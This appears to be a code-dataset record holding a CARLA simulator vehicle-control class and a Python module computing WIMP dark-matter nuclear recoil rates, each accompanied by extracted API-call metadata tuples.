[((445, 471), 'torch.nn.init.normal', 'init.normal', (['m.weight.data'], {}), '(m.weight.data)\n', (456, 471), True, 'import torch.nn.init as init\n'), ((497, 521), 'torch.nn.init.normal', 'init.normal', (['m.bias.data'], {}), '(m.bias.data)\n', (508, 521), True, 'import torch.nn.init as init\n'), ((677, 707), 'torch.nn.init.constant_', 'init.constant_', (['m.bias.data', '(0)'], {}), '(m.bias.data, 0)\n', (691, 707), True, 'import torch.nn.init as init\n'), ((640, 650), 'numpy.sqrt', 'np.sqrt', (['(2)'], {}), '(2)\n', (647, 650), True, 'import numpy as np\n'), ((863, 887), 'torch.nn.init.normal', 'init.normal', (['m.bias.data'], {}), '(m.bias.data)\n', (874, 887), True, 'import torch.nn.init as init\n'), ((973, 999), 'torch.nn.init.normal', 'init.normal', (['m.weight.data'], {}), '(m.weight.data)\n', (984, 999), True, 'import torch.nn.init as init\n'), ((826, 836), 'numpy.sqrt', 'np.sqrt', (['(2)'], {}), '(2)\n', (833, 836), True, 'import numpy as np\n'), ((1025, 1049), 'torch.nn.init.normal', 'init.normal', (['m.bias.data'], {}), '(m.bias.data)\n', (1036, 1049), True, 'import torch.nn.init as init\n'), ((1214, 1238), 'torch.nn.init.normal', 'init.normal', (['m.bias.data'], {}), '(m.bias.data)\n', (1225, 1238), True, 'import torch.nn.init as init\n'), ((1177, 1187), 'numpy.sqrt', 'np.sqrt', (['(2)'], {}), '(2)\n', (1184, 1187), True, 'import numpy as np\n'), ((1403, 1427), 'torch.nn.init.normal', 'init.normal', (['m.bias.data'], {}), '(m.bias.data)\n', (1414, 1427), True, 'import torch.nn.init as init\n'), ((1509, 1541), 'torch.nn.init.constant_', 'init.constant_', (['m.weight.data', '(1)'], {}), '(m.weight.data, 1)\n', (1523, 1541), True, 'import torch.nn.init as init\n'), ((1366, 1376), 'numpy.sqrt', 'np.sqrt', (['(2)'], {}), '(2)\n', (1373, 1376), True, 'import numpy as np\n'), ((1567, 1597), 'torch.nn.init.constant_', 'init.constant_', (['m.bias.data', '(0)'], {}), '(m.bias.data, 0)\n', (1581, 1597), True, 'import torch.nn.init as init\n'), ((1696, 1728), 'torch.nn.init.constant_', 'init.constant_', (['m.weight.data', '(1)'], {}), '(m.weight.data, 1)\n', (1710, 1728), True, 'import torch.nn.init as init\n'), ((1787, 1817), 'torch.nn.init.constant_', 'init.constant_', (['m.bias.data', '(0)'], {}), '(m.bias.data, 0)\n', (1801, 1817), True, 'import torch.nn.init as init\n'), ((1899, 1931), 'torch.nn.init.constant_', 'init.constant_', (['m.weight.data', '(1)'], {}), '(m.weight.data, 1)\n', (1913, 1931), True, 'import torch.nn.init as init\n'), ((1957, 1987), 'torch.nn.init.constant_', 'init.constant_', (['m.bias.data', '(0)'], {}), '(m.bias.data, 0)\n', (1971, 1987), True, 'import torch.nn.init as init\n'), ((2143, 2173), 'torch.nn.init.constant_', 'init.constant_', (['m.bias.data', '(0)'], {}), '(m.bias.data, 0)\n', (2157, 2173), True, 'import torch.nn.init as init\n'), ((2106, 2116), 'numpy.sqrt', 'np.sqrt', (['(2)'], {}), '(2)\n', (2113, 2116), True, 'import numpy as np\n'), ((2331, 2358), 'torch.nn.init.orthogonal', 'init.orthogonal', (['param.data'], {}), '(param.data)\n', (2346, 2358), True, 'import torch.nn.init as init\n'), ((2393, 2416), 'torch.nn.init.normal', 'init.normal', (['param.data'], {}), '(param.data)\n', (2404, 2416), True, 'import torch.nn.init as init\n'), ((2545, 2572), 'torch.nn.init.orthogonal', 'init.orthogonal', (['param.data'], {}), '(param.data)\n', (2560, 2572), True, 'import torch.nn.init as init\n'), ((2607, 2630), 'torch.nn.init.normal', 'init.normal', (['param.data'], {}), '(param.data)\n', (2618, 2630), True, 'import torch.nn.init as init\n'), ((2754, 2781), 'torch.nn.init.orthogonal', 'init.orthogonal', (['param.data'], {}), '(param.data)\n', (2769, 2781), True, 'import torch.nn.init as init\n'), ((2816, 2839), 'torch.nn.init.normal', 'init.normal', (['param.data'], {}), '(param.data)\n', (2827, 2839), True, 'import torch.nn.init as init\n'), ((2967, 2994), 'torch.nn.init.orthogonal', 'init.orthogonal', (['param.data'], {}), '(param.data)\n', (2982, 2994), True, 'import torch.nn.init as init\n'), ((3029, 3052), 'torch.nn.init.normal', 'init.normal', (['param.data'], {}), '(param.data)\n', (3040, 3052), True, 'import torch.nn.init as init\n')]
|
import carla
from __init__ import client, world
from TB_common_functions import wraptopi, calculateDistance, AgentColourToRGB
from path_planner_suite import astar_search, find_nearest
from shapely.geometry import LineString
import math
import numpy as np
import matplotlib.pyplot as plt
class vehicle_manual():
def __init__(self):
self.client = client
self.world = world
self.blueprint_library = self.world.get_blueprint_library()
self.vehicle_blueprint = self.blueprint_library.filter("vehicle.mercedes-benz.coupe")[0]
self.vehicle_blueprint.set_attribute('color', AgentColourToRGB("yellow"))
def spawn(self,x,y,z,yaw):
self.actor_list = []
self.spawn_orientation = yaw
self.transform = carla.Transform(carla.Location(x=float(x), y=float(y), z=float(z)), carla.Rotation(yaw=float(self.spawn_orientation)))
self.agent = self.world.spawn_actor(self.vehicle_blueprint, self.transform)
self.world.tick() # important to tick after spawning, otherwise actor details not reachable
self.actor_list.append(self.agent)
self.spawn_point_x = x
self.spawn_point_y = y
self.spawn_point_z = z
self.spawn_point_yaw = yaw
self.agentID = self.agent.id
self.agentType = self.agent.type_id
pass
def step(self):
pass
def Update_state_info(self):
agent_transform = self.agent.get_transform()
agent_location = agent_transform.location
agent_rotation = agent_transform.rotation
agent_velocity = self.agent.get_velocity() # This is an object vector
self.current_t = self.world_snapshot.timestamp.elapsed_seconds #ts.elapsed_seconds - start_of_simulation_timestamp
self.current_x = agent_location.x
self.current_y = agent_location.y
self.current_z = agent_location.z
self.current_yaw = wraptopi(math.radians(agent_rotation.yaw))
self.current_velocity = np.array([agent_velocity.x, agent_velocity.y, agent_velocity.z]) # This is an array as opposed to agent_velocity, which is an object
self.current_speed = np.sqrt(self.current_velocity.dot(self.current_velocity))
def get_pos(self):
self.Update_state_info()
self.pos_array = [self.current_x, self.current_y, self.current_z, self.current_yaw]
return self.pos_array
def destroy(self):
self.agent.destroy()
pass
def send_control(self, throttle, steer, brake, hand_brake=False, reverse=False):
self.control = carla.VehicleControl()
# Clamp all values within their limits
steer = np.fmax(np.fmin(steer, 1.0), -1.0)
throttle = np.fmax(np.fmin(throttle, 1.0), -1.0)
brake = np.fmax(np.fmin(brake, 1.0), -1.0)
self.control.steer = steer
self.control.throttle = throttle
self.control.brake = brake
self.control.hand_brake = hand_brake
self.control.reverse = reverse
self.agent.apply_control(self.control)
|
[
"numpy.fmin",
"TB_common_functions.AgentColourToRGB",
"math.radians",
"numpy.array",
"carla.VehicleControl"
] |
[((2012, 2076), 'numpy.array', 'np.array', (['[agent_velocity.x, agent_velocity.y, agent_velocity.z]'], {}), '([agent_velocity.x, agent_velocity.y, agent_velocity.z])\n', (2020, 2076), True, 'import numpy as np\n'), ((2556, 2578), 'carla.VehicleControl', 'carla.VehicleControl', ([], {}), '()\n', (2576, 2578), False, 'import carla\n'), ((581, 607), 'TB_common_functions.AgentColourToRGB', 'AgentColourToRGB', (['"""yellow"""'], {}), "('yellow')\n", (597, 607), False, 'from TB_common_functions import wraptopi, calculateDistance, AgentColourToRGB\n'), ((1937, 1969), 'math.radians', 'math.radians', (['agent_rotation.yaw'], {}), '(agent_rotation.yaw)\n', (1949, 1969), False, 'import math\n'), ((2658, 2677), 'numpy.fmin', 'np.fmin', (['steer', '(1.0)'], {}), '(steer, 1.0)\n', (2665, 2677), True, 'import numpy as np\n'), ((2722, 2744), 'numpy.fmin', 'np.fmin', (['throttle', '(1.0)'], {}), '(throttle, 1.0)\n', (2729, 2744), True, 'import numpy as np\n'), ((2789, 2808), 'numpy.fmin', 'np.fmin', (['brake', '(1.0)'], {}), '(brake, 1.0)\n', (2796, 2808), True, 'import numpy as np\n')]
|
#===============================WIMPFuncs.py===================================#
# Created by <NAME> 2020
# Contains all the functions for doing the WIMPy calculations
#==============================================================================#
import numpy as np
from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace
from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid
from numpy import nan, isnan, column_stack, amin, amax
from numpy.linalg import norm
from scipy.special import erf
from scipy.spatial import ConvexHull
import LabFuncs
import Params
from Params import m_p_keV, c_km, seconds2year, m_p_kg, GeV_2_kg, c_cm, Jan1
#==============================================================================#
#-------------------- Energy-Time dependent recoil rate------------------------#
#---------------------------------- v_min -------------------------------------#
def MinimumWIMPSpeed(E_r,A,m_chi,delta=0):
# E_r = recoil energy in keVr
# A = nucleus mass number
# m_chi = Wimp mass in GeV
# delta = for inelastic scattering
mu_p = 1.0e6*m_chi*m_p_keV/(1.0e6*m_chi + m_p_keV) # reduced proton mass
m_N_keV = A*m_p_keV # nucleus mass in keV
mu_N_keV = 1.0e6*m_chi*m_N_keV/(1.0e6*m_chi + m_N_keV) # reduced nucleus mass
v_min = sqrt(1.0/(2*m_N_keV*E_r))*(m_N_keV*E_r/mu_N_keV + delta)*c_km
return v_min
#---------------------------------- E_max -------------------------------------#
def MaxWIMPEnergy(A,m_chi,\
v_lab=LabFuncs.LabVelocitySimple(67.0),v_esc=Params.SHM.EscapeSpeed):
# A = nucleus mass number
# v_lab = Lab velocity in km/s
# m_chi = Wimp mass in GeV
# v_esc = Escape speed in km/s
m_N = m_p_keV*A
mu_N = 1.0e6*m_N*m_chi/(1.0e6*m_chi+m_N)
E_max_lim = 2.0*mu_N*mu_N*2.0*((v_esc+sqrt(sum(v_lab**2.0)))/c_km)**2.0/m_N
return E_max_lim
#----------------------General event rate -------------------------------------#
def R_wimp(E_th,E_max,m_chi,sigma_p=1.0e-45,\
Nuc=Params.Ar40,Loc=Params.GranSasso,\
HaloModel=Params.SHM,eff_on=False,eres_on=False):
nfine = 1000
Efine = logspace(-3.0,log10(200.0),nfine)
DM = Params.WIMP(m_chi,sigma_p)
# Calculate rate at day=67 to get ~average
dR = dRdE_wimp(Efine,array([(Jan1+67.0)]),DM,HaloModel,Nuc,Loc)
# Correct for efficiency
if eff_on:
dR *= LabFuncs.efficiency(Nuc,Efine)
# Smear by energy resolution
# if eres_on:
# dR = SmearE(Efine,dR,energyresolution(Nuc,Efine))
# Window
mask = (Efine<E_max)&(Efine>E_th)
R = trapz(dR[mask],Efine[mask])
return R
#-------------------- Energy dependent recoil rate-----------------------------#
def dRdE_wimp(E_r,t,DM,\
HaloModel=Params.SHM,Nuc=Params.Ar40,Loc=Params.GranSasso):
# relevant constants
A = Nuc.MassNumber # mass number of nucleus
m_chi = DM.Mass
mu_p = 1.0e6*m_chi*m_p_keV/(1.0e6*m_chi + m_p_keV)
sigma_p = DM.SICrossSection
v_0 = sqrt(2.0)*HaloModel.Dispersion
v_esc = HaloModel.EscapeSpeed
rho_0 = HaloModel.Density
N_esc = HaloModel.Normalisation
FF = LabFuncs.FormFactorHelm(E_r,A)**2.0
v_min = MinimumWIMPSpeed(E_r,A,m_chi)
R0 = (c_cm*c_cm)*((rho_0*1.0e6*A*A*sigma_p)/(2*m_chi*GeV_2_kg*mu_p*mu_p))
# init
ne = size(E_r)
nt = size(t)
dR = zeros(shape=ne)
gvmin = zeros(ne)
# Mean inverse speed
x = v_min/v_0
z = v_esc/v_0
if t[0] == t[-1]:
v_e = norm(LabFuncs.LabVelocity(t[0], Loc, HaloModel.RotationSpeed))
y = v_e/v_0
gvmin[(x<abs(y-z))&(z<y)] = (1.0/(v_0*y))
else:
v_e = zeros(shape=ne)
for i in range(0,nt):
v_e[i] = norm(LabFuncs.LabVelocity(t[i], Loc, HaloModel.RotationSpeed))
y = v_e/v_0
g1 = (1.0/(v_0*y))
gvmin[(x<abs(y-z))&(z<y)] = g1[(x<abs(y-z))&(z<y)]
g2 = (1.0/(2.0*N_esc*v_0*y))*(erf(x+y)-erf(x-y)-(4.0/sqrt(pi))*y*exp(-z**2))
g3 = (1.0/(2.0*N_esc*v_0*y))*(erf(z)-erf(x-y)-(2.0/sqrt(pi))*(y+z-x)*exp(-z**2))
gvmin[(x<abs(y-z))&(z>y)] = g2[(x<abs(y-z))&(z>y)]
gvmin[(abs(y-z)<x)&(x<(y+z))] = g3[(abs(y-z)<x)&(x<(y+z))]
gvmin[(y+z)<x] = 0.0
gvmin = gvmin/(1000.0*100.0) # convert to cm^-1 s
# Compute rate = (Rate amplitude * gmin * form factor)
dR = R0*gvmin*FF
dR = dR*seconds2year*1000.0 # convert to per ton-year
return dR
#-------------------- Direction dependent recoil rate--------------------------#
def dRdEdO_wimp(E,t,DM,HaloModel=Params.SHM,Nuc=Params.Ar40,\
Loc=Params.GranSasso,CygnusTracking=False):
E_r = sqrt(E[:,0]**2 + E[:,1]**2 + E[:,2]**2) # Recoil energy
x = zeros(shape=shape(E))
x[:,0] = E[:,0]/E_r # Recoil direction
x[:,1] = E[:,1]/E_r
x[:,2] = E[:,2]/E_r
# relevant constants
A = Nuc.MassNumber # mass number of nucleus
m_chi = DM.Mass
mu_p = 1.0e6*m_chi*m_p_keV/(1.0e6*m_chi + m_p_keV)
sigma_p = DM.SICrossSection
sig_v = HaloModel.Dispersion
v_esc = HaloModel.EscapeSpeed
rho_0 = HaloModel.Density
N_esc = HaloModel.Normalisation
FF = LabFuncs.FormFactorHelm(E_r,A)**2.0
v_min = MinimumWIMPSpeed(E_r,A,m_chi)
R0 = (c_cm*c_cm)*((rho_0*1.0e6*A*A*sigma_p)/(4*pi*m_chi*GeV_2_kg*mu_p*mu_p))
# Calculate v_lab
ne = size(E_r)
nt = size(t)
dR = zeros(shape=(size(E_r)))
v_lab = zeros(shape=(size(E_r),3))
for i in range(0,nt):
v_lab[i,:] = LabFuncs.LabVelocity(t[i], Loc, HaloModel.RotationSpeed)
# Just put vlab towards north pole for cygnus tracking experiment:
if CygnusTracking==True:
for i in range(0,nt):
v_lab[i,:] = array([0.0,0.0,sqrt(sum(v_lab[i,:]**2.0))])
# recoil projection
vlabdotq = (x[:,0]*v_lab[:,0]+x[:,1]*v_lab[:,1]+x[:,2]*v_lab[:,2])
# Radon transform
fhat = zeros(shape=shape(E_r))
fhat[((v_min+vlabdotq)<(v_esc))] = (1/(N_esc*sqrt(2*pi*sig_v**2.0)))\
*(exp(-(v_min[((v_min+vlabdotq)<(v_esc))]\
+vlabdotq[((v_min+vlabdotq)<(v_esc))])\
**2.0/(2*sig_v**2.0))\
-exp(-v_esc**2.0/(2*sig_v**2.0)))
fhat = fhat/(1000.0*100.0) # convert to cm^-1 s
# Compute rate = (Rate amplitude * radon trans. * form factor)
dR = R0*fhat*FF # correct for form factor
dR = dR*seconds2year*1000.0 # convert to per ton-year
return dR
#------------ 1-dimensional direction dependent recoil rate--------------------#
def dRdEdcosth_wimp(m_chi,t1,costh_vals,E_r_vals,\
Nuc=Params.Ar40,\
Loc=Params.GranSasso,\
sigma_p=1.0e-45,\
HaloModel=Params.SHM,\
np=20,\
CygnusTracking=False,\
ndims=2,
HT=False):
DM = Params.WIMP(m_chi,sigma_p)
ph = linspace(-pi, pi-(2*pi/(1.0*np)), np)
E1 = zeros(shape=(np,3))
E2 = zeros(shape=(np,3))
if ndims==1:
n = size(costh_vals)
dR = zeros(shape=(n))
for i in range(0,n):
costh = costh_vals[i]
E_r = E_r_vals[i]
E1[:,0] = E_r*cos(ph)*sqrt(1-costh**2.0)
E1[:,1] = E_r*sin(ph)*sqrt(1-costh**2.0)
E1[:,2] = E_r*costh
E2[:,0] = E_r*cos(ph)*sqrt(1-costh**2.0)
E2[:,1] = E_r*sin(ph)*sqrt(1-costh**2.0)
E2[:,2] = -1.0*E_r*costh
dR[i] = trapz(dRdEdO_wimp(E1,t1*ones(shape=np),DM,HaloModel,Nuc,Loc,CygnusTracking=CygnusTracking)\
+dRdEdO_wimp(E2,t1*ones(shape=np),DM,HaloModel,Nuc,Loc,CygnusTracking=CygnusTracking),ph)
elif ndims==2:
# 2D
ne = size(E_r_vals)
nc = size(costh_vals)
dR = zeros(shape=(nc,ne))
for i in range(0,nc):
costh = costh_vals[i]
for j in range(0,ne):
E_r = E_r_vals[j]
E1[:,0] = E_r*cos(ph)*sqrt(1-costh**2.0)
E1[:,1] = E_r*sin(ph)*sqrt(1-costh**2.0)
E1[:,2] = E_r*costh
dR[i,j] = trapz(dRdEdO_wimp(E1,t1*ones(shape=np),DM,HaloModel,Nuc,Loc,CygnusTracking=CygnusTracking))
if HT==False:
for i in range(0,nc):
costh = costh_vals[i]
for j in range(0,ne):
E_r = E_r_vals[j]
E2[:,0] = E_r*cos(ph)*sqrt(1-costh**2.0)
E2[:,1] = E_r*sin(ph)*sqrt(1-costh**2.0)
E2[:,2] = -1.0*E_r*costh
dR[i,j] += trapz(dRdEdO_wimp(E2,t1*ones(shape=np),DM,HaloModel,Nuc,Loc,CygnusTracking=CygnusTracking))
return dR
def R_Ecosth_wimp(m_chi,t1,A_CR,E_min,E_max=200.0,ne=50,nc=50,\
Nuc=Params.Ar40,\
Loc=Params.GranSasso,\
sigma_p=1.0e-45,\
HaloModel=Params.SHM,\
np=20,\
CygnusTracking=False,
HT=False):
E_r_edges = linspace(E_min,E_max,ne+1)
costh_edges = linspace(0.0,1.0,nc+1)
E_r_centers = (E_r_edges[1:]+E_r_edges[0:-1])/2.0
costh_centers = (costh_edges[1:]+costh_edges[0:-1])/2.0
dR = dRdEdcosth_wimp(m_chi,t1,costh_edges,E_r_edges,Nuc=Nuc,\
CygnusTracking=CygnusTracking,sigma_p=sigma_p,np=np,ndims=2,HaloModel=HaloModel,HT=HT)
[X,Y] = meshgrid(E_r_edges,costh_edges)
dX = X[1:,1:]-X[1:,0:-1]
dY = Y[1:,1:]-Y[0:-1,1:]
R = 0.5*0.5*dX*dY*(dR[1:,1:]+dR[1:,0:-1]+dR[0:-1,1:]+dR[0:-1,0:-1])
return E_r_centers,costh_centers,R
def R_Ecosth2_wimp(m_chi,t1,A_CR,E_min,E_max=200.0,ne=50,\
Nuc=Params.Ar40,\
Loc=Params.GranSasso,\
sigma_p=1.0e-45,\
HaloModel=Params.SHM,\
np=20,\
CygnusTracking=False):
nc_fine = 300
E_r_edges = linspace(E_min,E_max,ne+1)
S_edges = linspace(0.0,1.0,ne+1)
costh_edges = linspace(0.0,1.0,nc_fine+1)
costh_centers = (costh_edges[1:]+costh_edges[0:-1])/2.0
E_r_centers = (E_r_edges[1:]+E_r_edges[0:-1])/2.0
S_centers = (S_edges[1:]+S_edges[0:-1])/2.0
dE = E_r_edges[1]-E_r_edges[0]
R = zeros(shape=(ne,ne))
# dRf1 = dRdEdcosth_wimp(m_chi,t1,costh_edges,E_r_edges[0]*ones(shape=nc_fine+1),Nuc=Nuc,\
# CygnusTracking=CygnusTracking,sigma_p=sigma_p,np=np,ndims=1)
# for i in range(0,ne):
# dRf2 = dRdEdcosth_wimp(m_chi,t1,costh_edges,E_r_edges[i+1]*ones(shape=nc_fine+1),Nuc=Nuc,\
# CygnusTracking=CygnusTracking,sigma_p=sigma_p,np=np,ndims=1)
# for k in range(0,ne):
# dcosth = sqrt(S_edges[i+1]/A_CR)-sqrt(S_edges[i]/A_CR)
# mask = (costh_edges<sqrt(S_edges[k+1]/A_CR))*(costh_edges>sqrt(S_edges[k]/A_CR))
# R[k,i] = 0.5*dE*(trapz(dRf1[mask],costh_edges[mask])\
# +trapz(dRf2[mask],costh_edges[mask]))
# dRf1 = 1.0*dRf2
for i in range(0,ne):
if S_edges[i]<=A_CR:
for j in range(0,ne):
efine = linspace(E_r_edges[j],E_r_edges[j+1],5)
smin = S_edges[i]
smax = min(S_edges[i+1],A_CR)
cfine = linspace(sqrt(smin/A_CR),sqrt(smax/A_CR),5)
R[i,j] = trapz(trapz(dRdEdcosth_wimp(m_chi,t1,cfine,efine,Nuc=Nuc,HaloModel=HaloModel,\
CygnusTracking=CygnusTracking,sigma_p=sigma_p,np=np,ndims=2),cfine),efine)
return E_r_centers,S_centers,R
def R_IS_wimp(m_chi,t1,A_CR,E_min,E_max=200.0,ne=20,\
Nuc=Params.Ar40,\
Loc=Params.GranSasso,\
sigma_p=1.0e-45,\
HaloModel=Params.SHM,\
np=20,\
CygnusTracking=False):
E_o_edges = linspace(E_min,E_max,ne+1)
E_o_centers = (E_o_edges[1:]+E_o_edges[0:-1])/2.0
[I,S] = meshgrid(E_o_edges,E_o_edges)
C = sqrt((1.0/A_CR)*1.0/(I/S+1))
E = S+I
dR = zeros(shape=shape(C))
for i in range(0,ne+1):
mask = (C[i,:]<=1)&(E[i,:]<E_max)
costh_vals = C[i,mask]
E_r_vals = E[i,mask]
dR[i,mask] = dRdEdcosth_wimp(m_chi,t1,costh_vals,E_r_vals,Nuc=Nuc,\
CygnusTracking=CygnusTracking,\
sigma_p=sigma_p,\
np=np,ndims=1,HaloModel=HaloModel)
R = zeros(shape=(ne,ne))
for i in range(0,ne):
for j in range(0,ne):
x = array([E[i,j],E[i,j+1],E[i+1,j],E[i+1,j+1],
E[i,j],E[i,j+1],E[i+1,j],E[i+1,j+1]])
y = array([C[i,j],C[i,j+1],C[i+1,j],C[i+1,j+1],
C[i,j],C[i,j+1],C[i+1,j],C[i+1,j+1]])
z = array([0,0,0,0,
dR[i,j],dR[i,j+1],dR[i+1,j],dR[i+1,j+1]])
if any(z>0):
points = column_stack((x,y,z))
R[i,j] = ConvexHull(points,qhull_options='W1e-15 E1e-15').volume
return E_o_centers,R
# def R_Ecosth2_wimp_alt(m_chi,t1,A_CR,E_min,E_max=200.0,ne=50,\
# Nuc=Params.Ar40,\
# Loc=Params.GranSasso,\
# sigma_p=1.0e-45,\
# HaloModel=Params.SHM,\
# nside=8,\
# CygnusTracking=False):
# DM = Params.WIMP(m_chi,sigma_p)
# E_r_edges = linspace(E_min,E_max,ne+1)
# S_edges = linspace(0.0,1.0,ne+1)
# E_r_centers = (E_r_edges[1:]+E_r_edges[0:-1])/2.0
# S_centers = (S_edges[1:]+S_edges[0:-1])/2.0
# # Healpix discretisation of a sphere
# npix = 12*nside**2
# dpix = 4*pi/(npix*1.0)
# x_pix = zeros(shape=(npix,3))
# for i in range(0,npix):
# x_pix[i,:] = hp.pix2vec(nside, i)
# t1 = t1*ones(shape=npix)
# costh = x_pix[:,2]
# dE = E_r_edges[1]-E_r_edges[0]
# R = zeros(shape=(ne,ne))
# dRf1 = dpix*dRdEdO_wimp(E_r_edges[0]*x_pix,t1,DM,HaloModel,Nuc,Loc,CygnusTracking=CygnusTracking)
# for i in range(0,ne):
# dRf2 = dpix*dRdEdO_wimp(E_r_edges[i]*x_pix,t1,DM,HaloModel,Nuc,Loc,CygnusTracking=CygnusTracking)
# for k in range(0,ne):
# mask = (abs(costh)<sqrt(S_edges[k+1]/A_CR))*(abs(costh)>sqrt(S_edges[k]/A_CR))
# R[k,i] = 0.5*dE*(sum(dRf1[mask])+sum(dRf2[mask]))
# dRf1 = 1.0*dRf2
# return E_r_centers,S_centers,R
|
[
"LabFuncs.LabVelocity",
"numpy.ones",
"numpy.shape",
"numpy.sin",
"numpy.exp",
"LabFuncs.LabVelocitySimple",
"numpy.meshgrid",
"LabFuncs.efficiency",
"numpy.linspace",
"LabFuncs.FormFactorHelm",
"numpy.log10",
"numpy.trapz",
"numpy.size",
"scipy.special.erf",
"Params.WIMP",
"numpy.cos",
"scipy.spatial.ConvexHull",
"numpy.zeros",
"numpy.array",
"numpy.column_stack",
"numpy.sqrt"
] |
[((1528, 1560), 'LabFuncs.LabVelocitySimple', 'LabFuncs.LabVelocitySimple', (['(67.0)'], {}), '(67.0)\n', (1554, 1560), False, 'import LabFuncs\n'), ((2213, 2240), 'Params.WIMP', 'Params.WIMP', (['m_chi', 'sigma_p'], {}), '(m_chi, sigma_p)\n', (2224, 2240), False, 'import Params\n'), ((2618, 2646), 'numpy.trapz', 'trapz', (['dR[mask]', 'Efine[mask]'], {}), '(dR[mask], Efine[mask])\n', (2623, 2646), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((3351, 3360), 'numpy.size', 'size', (['E_r'], {}), '(E_r)\n', (3355, 3360), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((3370, 3377), 'numpy.size', 'size', (['t'], {}), '(t)\n', (3374, 3377), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((3387, 3402), 'numpy.zeros', 'zeros', ([], {'shape': 'ne'}), '(shape=ne)\n', (3392, 3402), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((3415, 3424), 'numpy.zeros', 'zeros', (['ne'], {}), '(ne)\n', (3420, 3424), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((4653, 4701), 'numpy.sqrt', 'sqrt', (['(E[:, 0] ** 2 + E[:, 1] ** 2 + E[:, 2] ** 2)'], {}), '(E[:, 0] ** 2 + E[:, 1] ** 2 + E[:, 2] ** 2)\n', (4657, 4701), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((5344, 5353), 'numpy.size', 'size', (['E_r'], {}), '(E_r)\n', (5348, 5353), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((5363, 5370), 'numpy.size', 'size', (['t'], {}), '(t)\n', (5367, 5370), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((6951, 6978), 'Params.WIMP', 'Params.WIMP', (['m_chi', 'sigma_p'], {}), '(m_chi, sigma_p)\n', (6962, 6978), False, 'import Params\n'), ((6987, 7030), 'numpy.linspace', 'linspace', (['(-pi)', '(pi - 2 * pi / (1.0 * np))', 'np'], {}), '(-pi, pi - 2 * pi / (1.0 * np), np)\n', (6995, 7030), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((7034, 7054), 'numpy.zeros', 'zeros', ([], {'shape': '(np, 3)'}), '(shape=(np, 3))\n', (7039, 7054), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((7063, 7083), 'numpy.zeros', 'zeros', ([], {'shape': '(np, 3)'}), '(shape=(np, 3))\n', (7068, 7083), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((9112, 9142), 'numpy.linspace', 'linspace', (['E_min', 'E_max', '(ne + 1)'], {}), '(E_min, E_max, ne + 1)\n', (9120, 9142), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((9157, 9183), 'numpy.linspace', 'linspace', (['(0.0)', '(1.0)', '(nc + 1)'], {}), '(0.0, 1.0, nc + 1)\n', (9165, 9183), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((9473, 9505), 'numpy.meshgrid', 'meshgrid', (['E_r_edges', 'costh_edges'], {}), '(E_r_edges, costh_edges)\n', (9481, 9505), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((10003, 10033), 'numpy.linspace', 'linspace', (['E_min', 'E_max', '(ne + 1)'], {}), '(E_min, E_max, ne + 1)\n', (10011, 10033), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((10044, 10070), 'numpy.linspace', 'linspace', (['(0.0)', '(1.0)', '(ne + 1)'], {}), '(0.0, 1.0, ne + 1)\n', (10052, 10070), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((10085, 10116), 'numpy.linspace', 'linspace', (['(0.0)', '(1.0)', '(nc_fine + 1)'], {}), '(0.0, 1.0, nc_fine + 1)\n', (10093, 10116), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((10320, 10341), 'numpy.zeros', 'zeros', ([], {'shape': '(ne, ne)'}), '(shape=(ne, ne))\n', (10325, 10341), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((11923, 11953), 'numpy.linspace', 'linspace', (['E_min', 'E_max', '(ne + 1)'], {}), '(E_min, E_max, ne + 1)\n', (11931, 11953), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((12016, 12046), 'numpy.meshgrid', 'meshgrid', (['E_o_edges', 'E_o_edges'], {}), '(E_o_edges, E_o_edges)\n', (12024, 12046), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((12054, 12090), 'numpy.sqrt', 'sqrt', (['(1.0 / A_CR * 1.0 / (I / S + 1))'], {}), '(1.0 / A_CR * 1.0 / (I / S + 1))\n', (12058, 12090), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((12558, 12579), 'numpy.zeros', 'zeros', ([], {'shape': '(ne, ne)'}), '(shape=(ne, ne))\n', (12563, 12579), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((2184, 2196), 'numpy.log10', 'log10', (['(200.0)'], {}), '(200.0)\n', (2189, 2196), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((2313, 2333), 'numpy.array', 'array', (['[Jan1 + 67.0]'], {}), '([Jan1 + 67.0])\n', (2318, 2333), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((2415, 2446), 'LabFuncs.efficiency', 'LabFuncs.efficiency', (['Nuc', 'Efine'], {}), '(Nuc, Efine)\n', (2434, 2446), False, 'import LabFuncs\n'), ((3034, 3043), 'numpy.sqrt', 'sqrt', (['(2.0)'], {}), '(2.0)\n', (3038, 3043), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, 